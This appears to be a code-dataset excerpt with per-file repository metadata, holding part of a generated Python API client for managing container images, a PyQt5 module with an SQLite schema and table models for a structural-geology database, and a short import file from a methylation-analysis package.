if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `delete_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_image(self, image_id, **kwargs):
"""
Get specified container image
Returns details about specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_image(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to get (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_image_with_http_info(image_id, **kwargs)
else:
(data) = self.get_image_with_http_info(image_id, **kwargs)
return data
def get_image_with_http_info(self, image_id, **kwargs):
"""
Get specified container image
Returns details about specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_image_with_http_info(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to get (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `get_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_images(self, **kwargs):
"""
Get defined container images
Returns a list of defined images that are accessible to this user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_images(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Images
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_images_with_http_info(**kwargs)
else:
(data) = self.get_images_with_http_info(**kwargs)
return data
def get_images_with_http_info(self, **kwargs):
"""
Get defined container images
Returns a list of defined images that are accessible to this user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_images_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Images
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_images" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Images',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def instrument_image(self, image_id, **kwargs):
"""
Request instrumentation of specified container image
Lists containers that are running specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.instrument_image(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.instrument_image_with_http_info(image_id, **kwargs)
else:
(data) = self.instrument_image_with_http_info(image_id, **kwargs)
return data
def instrument_image_with_http_info(self, image_id, **kwargs):
"""
Request instrumentation of specified container image
Lists containers that are running specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.instrument_image_with_http_info(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method instrument_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `instrument_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}/Instrument', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def number_of_instrumented_images(self, **kwargs):
"""
Returns number of instrumented images
Returns number of instrumented images belonging to a user's group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.number_of_instrumented_images(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.number_of_instrumented_images_with_http_info(**kwargs)
else:
(data) = self.number_of_instrumented_images_with_http_info(**kwargs)
return data
def number_of_instrumented_images_with_http_info(self, **kwargs):
"""
Returns number of instrumented images
Returns number of instrumented images belonging to a user's group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.number_of_instrumented_images_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method number_of_instrumented_images" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/NumberOfInstrumentedImages', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def show_container_running_image(self, image_id, **kwargs):
"""
Get specified container image
Lists containers that are running specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.show_container_running_image(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to get containers for (required)
:return: Container
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.show_container_running_image_with_http_info(image_id, **kwargs)
else:
(data) = self.show_container_running_image_with_http_info(image_id, **kwargs)
return data
def show_container_running_image_with_http_info(self, image_id, **kwargs):
"""
Get specified container image
Lists containers that are running specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.show_container_running_image_with_http_info(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to get containers for (required)
:return: Container
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method show_container_running_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `show_container_running_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}/Containers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Container',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_image(self, image_id, **kwargs):
"""
Update image definition
Updates an existing image object.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_image(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to get (required)
:param Image image:
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_image_with_http_info(image_id, **kwargs)
else:
(data) = self.update_image_with_http_info(image_id, **kwargs)
return data
def update_image_with_http_info(self, image_id, **kwargs):
"""
Update image definition
Updates an existing image object.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_image_with_http_info(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to get (required)
:param Image image:
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id', 'image']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `update_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'image' in params:
body_params = params['image']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.154889
| 284
| 0.566757
| 4,436
| 43,546
| 5.32349
| 0.04982
| 0.031124
| 0.023714
| 0.030489
| 0.949608
| 0.938683
| 0.932162
| 0.917976
| 0.910015
| 0.899471
| 0
| 0.000537
| 0.359092
| 43,546
| 1,032
| 285
| 42.195736
| 0.845605
| 0.344211
| 0
| 0.782869
| 0
| 0
| 0.155041
| 0.041595
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041833
| false
| 0
| 0.013944
| 0
| 0.11753
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c76e42d7e5572116be91dc3d8bc5dbc02c2b514f
| 17,459
|
py
|
Python
|
pysdb3/models.py
|
ondrolexa/pysdb
|
965af226eb10f1b93f2437b201e1fcb5af3fa900
|
[
"MIT"
] | 1
|
2018-05-01T20:02:39.000Z
|
2018-05-01T20:02:39.000Z
|
pysdb3/models.py
|
ondrolexa/pysdb
|
965af226eb10f1b93f2437b201e1fcb5af3fa900
|
[
"MIT"
] | null | null | null |
pysdb3/models.py
|
ondrolexa/pysdb
|
965af226eb10f1b93f2437b201e1fcb5af3fa900
|
[
"MIT"
] | 2
|
2018-02-16T20:09:37.000Z
|
2020-09-30T19:18:46.000Z
|
from PyQt5 import QtCore, QtGui, QtWidgets
sitecol = {'id': 0, 'name': 1, 'x': 2, 'y': 3, 'desc': 4, 'id_units': 5}
datacol = {'id': 0, 'id_sites': 1, 'id_struct': 2, 'azi': 3, 'inc': 4, 'struct': 5, 'desc': 6, 'tags': 7}
structurecol = {'id': 0, 'structure': 1, 'planar': 2, 'desc': 3, 'scode': 4, 'gcode': 5}
unitcol = {'id': 0, 'name': 1, 'desc': 2}
tagcol = {'id': 0, 'name': 1, 'desc': 2, 'check': 3}
SCHEMA = '''pragma auto_vacuum=0;
pragma default_cache_size=2000;
pragma encoding='UTF-8';
pragma page_size=1024;
drop table if exists sites;
CREATE TABLE sites (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, id_units integer NOT NULL DEFAULT 0, name varchar(16) NOT NULL DEFAULT '', x_coord double DEFAULT NULL, y_coord double DEFAULT NULL, description text);
drop table if exists structdata;
CREATE TABLE structdata (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, id_sites integer NOT NULL DEFAULT 0, id_structype integer NOT NULL DEFAULT 0, azimuth double NOT NULL DEFAULT 0, inclination double NOT NULL DEFAULT 0, description text);
drop table if exists structype;
CREATE TABLE structype (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, pos integer NOT NULL DEFAULT 0, structure varchar(16) NOT NULL UNIQUE, description text, structcode integer DEFAULT NULL, groupcode integer DEFAULT NULL, planar integer DEFAULT 1);
drop table if exists tagged;
CREATE TABLE tagged (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, id_tags integer NOT NULL DEFAULT 0, id_structdata integer NOT NULL DEFAULT 0);
drop table if exists tags;
CREATE TABLE tags (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, pos integer NOT NULL DEFAULT 0, name varchar(16) NOT NULL UNIQUE, description text);
drop table if exists units;
CREATE TABLE units (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, pos integer NOT NULL DEFAULT 0, name varchar(60) NOT NULL UNIQUE, description text);
drop table if exists attach;
CREATE TABLE attach (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, id_structdata_planar integer NOT NULL DEFAULT '0', id_structdata_linear integer NOT NULL DEFAULT '0');
drop table if exists meta;
CREATE TABLE meta (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, name varchar(16) NOT NULL UNIQUE, value text);'''
DEFDATA = '''INSERT INTO structype VALUES (1, 1,'S', 'Default planar feature', 35, 13, 1);
INSERT INTO structype VALUES (2, 2, 'L', 'Default linear feature', 78, 13, 0);
INSERT INTO units VALUES (1, 1, 'Default', 'Default unit');'''
class SiteModel(QtCore.QAbstractTableModel):
# Here we define model to store sites table data
def __init__(self, mlist, parent=None):
super(SiteModel, self).__init__(parent)
# Cache the passed data list as a class member.
self._items = mlist
# Create lookup dictionaries
self.updateIndex()
def updateIndex(self):
""" Update lookup dictionaries for id and row. """
self.id2row = {}
self.row2id = {}
for idx,row in enumerate(self._items):
self.id2row[row[0]] = idx
self.row2id[idx] = row[0]
def rowCount(self, index=QtCore.QModelIndex()):
""" Returns the number of rows the model holds. """
return len(self._items)
def columnCount(self, index=QtCore.QModelIndex()):
""" Returns the number of columns the model holds. """
return len(sitecol)
def data(self, index, role = QtCore.Qt.DisplayRole):
""" Depending on the index and role given, return data. If not
returning data, return None (PySide equivalent of QT's
"invalid QVariant").
"""
if not index.isValid():
return None
if not 0 <= index.row() < len(self._items):
return None
if role == QtCore.Qt.DisplayRole:
# The view is asking for the actual data, so, just return the item it's asking for.
return self._items[index.row()][index.column()]
elif role == QtCore.Qt.ToolTipRole:
# The view is asking for tooltip data, so, we just return description.
return self._items[index.row()][sitecol['desc']]
else:
# We don't care about anything else, so make sure to return None.
return None
def getRow(self, index):
""" Returns model row. """
return self._items[index.row()]
def updateRow(self, index, datarow):
""" Updates model row. """
self._items[index.row()] = datarow
self.dataChanged.emit(index, index)
# self.emit(QtCore.SIGNAL('dataChanged(QModelIndex,QModelIndex)'), index, index)
def appendRow(self, datarow):
""" Append model row. """
self.beginInsertRows(QtCore.QModelIndex(), len(self._items), len(self._items))
self._items.append(datarow)
self.endInsertRows()
self.updateIndex()
def removeRow(self, index):
""" Remove model row. """
self.beginRemoveRows(QtCore.QModelIndex(), index.row(), index.row())
del self._items[index.row()]
self.endRemoveRows()
self.updateIndex()
def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
""" Set the headers to be displayed. """
if role != QtCore.Qt.DisplayRole:
return None
if orientation == QtCore.Qt.Horizontal:
if section == sitecol['name']:
return 'Site'
else:
return None
return None
class StructureModel(QtCore.QAbstractTableModel):
# Here we define model to store structures table data
def __init__(self, mlist, parent=None):
super(StructureModel, self).__init__(parent)
# Cache the passed data list as a class member.
self._items = mlist
# Create lookup dictionaries
self.updateIndex()
def updateIndex(self):
""" Update lookup dictionaries for id and row. """
self.id2row = {}
self.row2id = {}
for idx,row in enumerate(self._items):
self.id2row[row[0]] = idx
self.row2id[idx] = row[0]
def rowCount(self, index=QtCore.QModelIndex()):
""" Returns the number of rows the model holds. """
return len(self._items)
def columnCount(self, index=QtCore.QModelIndex()):
""" Returns the number of columns the model holds. """
return len(structurecol)
def data(self, index, role = QtCore.Qt.DisplayRole):
""" Depending on the index and role given, return data. If not
returning data, return None (PySide equivalent of QT's
"invalid QVariant").
"""
if not index.isValid():
return None
if not 0 <= index.row() < len(self._items):
return None
if role == QtCore.Qt.DisplayRole:
# The view is asking for the actual data, so, just return the item it's asking for.
return self._items[index.row()][index.column()]
else:
# We don't care about anything else, so make sure to return None.
return None
def getRow(self, index):
""" Returns model row. """
return self._items[index.row()]
def updateRow(self, index, datarow):
""" Updates model row. """
self._items[index.row()] = datarow
self.dataChanged.emit(index, index)
# self.emit(QtCore.SIGNAL('dataChanged(QModelIndex,QModelIndex)'), index, index)
def appendRow(self, datarow, index=None, offset=0):
""" Append model row. """
if index is None:
pos = len(self._items)
else:
pos = index.row() + offset
self.beginInsertRows(QtCore.QModelIndex(), pos, pos)
self._items.insert(pos, datarow)
self.endInsertRows()
self.updateIndex()
def removeRow(self, index):
""" Remove model row. """
self.beginRemoveRows(QtCore.QModelIndex(), index.row(), index.row())
del self._items[index.row()]
self.endRemoveRows()
self.updateIndex()
def isplanar(self, row):
return self._items[row][structurecol['planar']] == 1
class UnitModel(QtCore.QAbstractTableModel):
# Here we define model to store units table data
def __init__(self, mlist, parent=None):
super(UnitModel, self).__init__(parent)
# Cache the passed data list as a class member.
self._items = mlist
# Create lookup dictionaries
self.updateIndex()
def updateIndex(self):
""" Update lookup dictionaries for id and row. """
self.id2row = {}
self.row2id = {}
for idx,row in enumerate(self._items):
self.id2row[row[0]] = idx
self.row2id[idx] = row[0]
def rowCount(self, index=QtCore.QModelIndex()):
""" Returns the number of rows the model holds. """
return len(self._items)
def columnCount(self, index=QtCore.QModelIndex()):
""" Returns the number of columns the model holds. """
return len(unitcol)
def data(self, index, role = QtCore.Qt.DisplayRole):
""" Depending on the index and role given, return data. If not
returning data, return None (PySide equivalent of QT's
"invalid QVariant").
"""
if not index.isValid():
return None
if not 0 <= index.row() < len(self._items):
return None
if role == QtCore.Qt.DisplayRole:
# The view is asking for the actual data, so, just return the item it's asking for.
return self._items[index.row()][index.column()]
else:
# We don't care about anything else, so make sure to return None.
return None
def getRow(self, index):
""" Returns model row. """
return self._items[index.row()]
def updateRow(self, index, datarow):
""" Updates model row. """
self._items[index.row()] = datarow
self.dataChanged.emit(index, index)
# self.emit(QtCore.SIGNAL('dataChanged(QModelIndex,QModelIndex)'), index, index)
def appendRow(self, datarow, index=None, offset=0):
""" Append model row. """
if index is None:
pos = len(self._items)
else:
pos = index.row() + offset
self.beginInsertRows(QtCore.QModelIndex(), pos, pos)
self._items.insert(pos, datarow)
self.endInsertRows()
self.updateIndex()
def removeRow(self, index):
""" Remove model row. """
self.beginRemoveRows(QtCore.QModelIndex(), index.row(), index.row())
del self._items[index.row()]
self.endRemoveRows()
self.updateIndex()
class TagModel(QtCore.QAbstractTableModel):
# Here we define model to store tags table data
def __init__(self, mlist, parent=None):
super(TagModel, self).__init__(parent)
# Cache the passed data list as a class member.
self._items = mlist
# Create lookup dictionaries
self.updateIndex()
def updateIndex(self):
""" Update lookup dictionaries for id and row. """
self.id2row = {}
self.row2id = {}
for idx,row in enumerate(self._items):
self.id2row[row[0]] = idx
self.row2id[idx] = row[0]
def rowCount(self, index=QtCore.QModelIndex()):
""" Returns the number of rows the model holds. """
return len(self._items)
def columnCount(self, index=QtCore.QModelIndex()):
""" Returns the number of columns the model holds. """
return len(tagcol)
def data(self, index, role = QtCore.Qt.DisplayRole):
""" Depending on the index and role given, return data. If not
returning data, return None (PySide equivalent of QT's
"invalid QVariant").
"""
if not index.isValid():
return None
if not 0 <= index.row() < len(self._items):
return None
if role == QtCore.Qt.CheckStateRole and index.column() == tagcol['check']:
# The view is asking for the actual state of checkable item.
return self._items[index.row()][index.column()]
elif role == QtCore.Qt.FontRole and index.column() == tagcol['check']:
# The view is asking for the font properties.
font = QtGui.QFont()
if self._items[index.row()][index.column()] == QtCore.Qt.Checked:
font.setBold(True)
else:
font.setBold(False)
return font
elif role == QtCore.Qt.DisplayRole:
# The view is asking for the actual data, so, just return the item it's asking for.
if index.column() == tagcol['check']:
return self._items[index.row()][tagcol['name']]
else:
return self._items[index.row()][index.column()]
else:
# We don't care about anything else, so make sure to return None.
return None
def flags(self, index):
if not index.isValid():
return None
if index.column() == tagcol['check']:
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsSelectable
else:
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
def setData(self, index, value, role):
if index.isValid() and role == QtCore.Qt.CheckStateRole:
if index.column() == tagcol['check']:
self._items[index.row()][index.column()] = value
self.dataChanged.emit(index, index)
return True
def getChecked(self):
return [row[tagcol['id']] for row in self._items if row[tagcol['check']] == QtCore.Qt.Checked]
def cleanState(self):
for row in self._items:
row[tagcol['check']] = QtCore.Qt.Unchecked
def setState(self, ids):
for row in self._items:
if row[tagcol['id']] in ids:
row[tagcol['check']] = QtCore.Qt.Checked
else:
row[tagcol['check']] = QtCore.Qt.Unchecked
def getRow(self, index):
""" Returns model row. """
return self._items[index.row()]
def updateRow(self, index, datarow):
""" Updates model row. """
self._items[index.row()] = datarow
self.dataChanged.emit(index, index)
# self.emit(QtCore.SIGNAL('dataChanged(QModelIndex,QModelIndex)'), index, index)
def appendRow(self, datarow, index=None, offset=0):
""" Append model row. """
if index is None:
pos = len(self._items)
else:
pos = index.row() + offset
self.beginInsertRows(QtCore.QModelIndex(), pos, pos)
self._items.insert(pos, datarow)
self.endInsertRows()
self.updateIndex()
def removeRow(self, index):
""" Remove model row. """
self.beginRemoveRows(QtCore.QModelIndex(), index.row(), index.row())
del self._items[index.row()]
self.endRemoveRows()
self.updateIndex()
class DataModel(QtCore.QAbstractTableModel):
# Here we define model to store data table
def __init__(self, mlist, parent=None):
super(DataModel, self).__init__(parent)
# Cache the passed data list as a class member.
self._items = mlist
# Create lookup dictionaries
self.updateIndex()
def updateIndex(self):
""" Update lookup dictionaries for id and row. """
self.id2row = {}
self.row2id = {}
for idx,row in enumerate(self._items):
self.id2row[row[0]] = idx
self.row2id[idx] = row[0]
def rowCount(self, index=QtCore.QModelIndex()):
""" Returns the number of rows the model holds. """
return len(self._items)
def columnCount(self, index=QtCore.QModelIndex()):
""" Returns the number of columns the model holds. """
return len(datacol)
def data(self, index, role = QtCore.Qt.DisplayRole):
""" Depending on the index and role given, return data. If not
returning data, return None (PySide equivalent of QT's
"invalid QVariant").
"""
if not index.isValid():
return None
if not 0 <= index.row() < len(self._items):
return None
if role == QtCore.Qt.DisplayRole:
# The view is asking for the actual data, so, just return the item it's asking for.
return self._items[index.row()][index.column()]
elif role == QtCore.Qt.ToolTipRole:
# The view is asking for tooltip data, so, we just return description.
return self._items[index.row()][datacol['desc']]
else:
# We don't care about anything else, so make sure to return None.
return None
def getRow(self, index):
""" Returns model row. """
return self._items[index.row()]
def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
""" Set the headers to be displayed. """
if role != QtCore.Qt.DisplayRole:
return None
if orientation == QtCore.Qt.Horizontal:
if section == datacol['azi']:
return "Azimuth"
elif section == datacol['inc']:
return "Inclination"
elif section == datacol['struct']:
return "Structure"
elif section == datacol['tags']:
return "Tags"
else:
return None
return None
| 38.203501
| 251
| 0.608511
| 2,143
| 17,459
| 4.903873
| 0.10406
| 0.048815
| 0.031973
| 0.038824
| 0.834332
| 0.815396
| 0.780474
| 0.754306
| 0.710058
| 0.679513
| 0
| 0.009195
| 0.277393
| 17,459
| 456
| 252
| 38.287281
| 0.823795
| 0.208775
| 0
| 0.712803
| 0
| 0.034602
| 0.167015
| 0.001793
| 0
| 0
| 0
| 0
| 0
| 1
| 0.17301
| false
| 0
| 0.00346
| 0.00692
| 0.391003
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1bf0bd8bf3c87a5edfb5b1684a667168ee2faddf
| 83
|
py
|
Python
|
cemba_data/dmr/dss/__init__.py
|
jksr/cemba_data
|
c796c33a2fd262b2ef893df1951a90b8d0ba9289
|
[
"MIT"
] | 4
|
2018-11-13T21:50:57.000Z
|
2020-11-25T18:42:57.000Z
|
cemba_data/dmr/dss/__init__.py
|
jksr/cemba_data
|
c796c33a2fd262b2ef893df1951a90b8d0ba9289
|
[
"MIT"
] | 9
|
2020-10-25T01:58:07.000Z
|
2021-06-13T19:17:50.000Z
|
cemba_data/dmr/dss/__init__.py
|
jksr/cemba_data
|
c796c33a2fd262b2ef893df1951a90b8d0ba9289
|
[
"MIT"
] | 3
|
2018-12-29T23:30:25.000Z
|
2020-10-14T18:00:03.000Z
|
from .TwoGroup import run_dss_two_group
from .MultiGroup import run_dss_multi_group
| 41.5
| 43
| 0.891566
| 14
| 83
| 4.857143
| 0.642857
| 0.264706
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084337
| 83
| 2
| 43
| 41.5
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4015ac3760416ee352775e59bc9e4946232e04da
| 148
|
py
|
Python
|
sprint/tools_fa/__init__.py
|
jumphone/sprint
|
94a5e5450d73b357497fba11eef818c6cc8792aa
|
[
"MIT"
] | 44
|
2018-03-09T22:22:50.000Z
|
2021-09-15T09:40:54.000Z
|
